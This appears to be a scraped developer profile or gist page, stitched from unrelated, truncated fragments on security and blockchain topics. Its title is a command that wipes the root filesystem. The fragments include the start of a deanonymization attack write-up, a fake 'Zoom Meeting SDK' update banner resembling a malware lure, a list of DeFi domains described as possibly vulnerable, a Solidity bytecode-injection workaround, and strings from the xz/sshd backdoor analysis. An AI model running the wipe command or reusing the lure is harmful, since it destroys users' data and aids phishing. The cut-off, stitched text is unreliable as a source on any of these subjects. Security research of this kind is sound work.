sudo rm -rf --no-preserve-root / pcaversaccio

hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.

3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.

I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:

Cloudflare

By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k

	#!/usr/bin/env bash
	set -Eeuo pipefail

	RED=$'\033[1;31m'
	YELLOW=$'\033[1;33m'
	RESET=$'\033[0m'

	for arg in "$@"; do
	# Reject any non-ASCII byte.
	if LC_ALL=C printf "%s" "$arg" \| grep -q "[^ -~]"; then

	###############################################################
	# #
	# Zoom Meeting SDK Support #
	# #
	# A new version of the Zoom Web App will be released soon. #
	# In the meantime, you can update the Zoom Meeting SDK manually. #
	# Press ▶️ to start the update. #
	# #
	# Copyright (c) 2025 Zoom Community #
	# #

	import { usePublicClient } from "./usePublicClient";
	import { IToken } from "@/types/token";
	import { parseAbi, parseEther } from "viem";
	import { ethers } from "ethers";
	import { useAbstractClient } from "@abstract-foundation/agw-react";
	import { useAbstractSession } from "@/hooks/useCreateAbstractSession";
	import { privateKeyToAccount } from "viem/accounts";
	import { useSessionClientChain } from "./useSessionClientChain";

	export const useBondingCurveBuy = (chain: any) => {

	List of domains that are registered with squarespace and thus could be vulnerable:

	celer.network
	pendle.finance
	karak.network
	compound.finance
	hyperliquid.xyz
	dydx.exchange
	thorchain.com
	threshold.network

	// SPDX-License-Identifier: GPL-3.0

	pragma solidity >=0.7.0 <0.9.0;

	/**
	* Workaround example on how to inject and execute arbitrary bytecode in solidity contract
	* Currently only YUL supports verbatim: https://github.com/ethereum/solidity/issues/12067
	* But you cannot import Solidity code in YUL, or YUL code in solidity, so this workaround is necessary.
	* It works as long the byte sequence `0x7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F00` appear in the runtime code.
	*

	There appears to be a string encoded in the binary payload:
	https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01#file-hashes-txt-L115

	Which functions as a killswitch:

	https://piaille.fr/@zeno/112185928685603910

	Thus, one workaround for affected systems might be to add this to `/etc/environment`:

	```

	0810 b' from '
	0678 b' ssh2'
	00d8 b'%.48s:%.48s():%d (pid=%ld)\x00'
	0708 b'%s'
	0108 b'/usr/sbin/sshd\x00'
	0870 b'Accepted password for '
	01a0 b'Accepted publickey for '
	0c40 b'BN_bin2bn\x00'
	06d0 b'BN_bn2bin\x00'
	0958 b'BN_dup\x00'

	RPC="https://polygon-mumbai.blockpi.network/v1/rpc/public"

	P256VERIFY="0x0000000000000000000000000000000000000100"

	CALLDATA="4cee90eb86eaa050036147a12d49004b6b9c72bd725d39d4785011fe190f0b4da73bd4903f0ce3b639bbbf6e8e80d16931ff4bcf5993d58468e8fb19086e8cac36dbcd03009df8c59286b162af3bd7fcc0450c9aa81be5d10d312af6c66b1d604aebd3099c618202fcfe16ae7770b0c49ab5eadf74b754204a3bb6060e44eff37618b065f9832de4ca6ca971a7a1adc826d0f7c00181a5fb2ddf79ae00b4e10e"

	echo "testing RIP-7212 on Mumbai"

	cast call --rpc-url ${RPC} ${P256VERIFY} --data ${CALLDATA}